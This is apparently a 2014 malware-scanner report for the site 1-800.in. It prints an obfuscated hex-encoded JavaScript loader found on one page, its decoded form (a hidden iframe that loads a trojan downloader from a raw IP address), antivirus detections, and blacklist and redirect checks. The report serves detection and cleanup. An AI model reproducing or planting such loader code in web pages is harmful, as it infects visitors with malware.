New scan:

Malware Scanner report for 1-800.in

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/1
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.1-800.in/mobile
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 17 Jul 2014 08:45:13 GMT
Location: http://www.1-800.in/mobile/
Server: Apache
Content-Length: 297
Content-Type: text/html; charset=iso-8859-1
clean
http://www.1-800.in/mobile/
500 Internal Server Error
Content-Length: 1902
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v476393dd1508b(v476393dd15884){ return(parseInt(v476393dd15884,16));}function v476393dd17080(v476393dd17883){ var v476393dd19063=2; var v476393dd18076='';for(v476393dd188c3=0; v476393dd188c3<v476393dd17883.length; v476393dd188c3+=v476393dd19063){ v476393dd18076+=(String.fromCharCode(v476393dd1508b(v476393dd17883.substr(v476393dd188c3, v476393dd19063))));}return v476393dd18076;} document.write(v476393dd17080('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D34366562663436633761207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3833393730292B276262366130386334626165365C272077696474683D333131206865696768743D323730207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Decoded script:


<SCRIPT>window.status='Done';document.write('<iframe name=46ebf46c7a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*83970)+'bb6a08c4bae6\' width=311 height=270 style=\'display: none\'></iframe>')</SCRIPT>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan-Downloader.HTML.Agent
K7AntiVirus
Riskware
Kaspersky
Trojan-Downloader.JS.Iframe.ys
Microsoft
TrojanDownloader:HTML/Agent.K
NANO-Antivirus
Trojan.Script.Agent.gcfu
VIPRE
Trojan-Clicker.HTML.IFrame (v)
F-Prot
JS/IFrame.A.gen
GData
HTML:Iframe-inf
Commtouch
JS/IFrame.A.gen

Hidden iFrame found.
size: 1x1     style: hidden
src: http://url

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

http://www.1-800.in/test404page.js
404 Not Found
Content-Length: 954
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 1-800.in

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1-800.in
Referer: http://www.google.com/search?q=1-800.in

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=1-800.in

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1-800.in/

Result: 1-800.in is not infected or malware details are not published yet.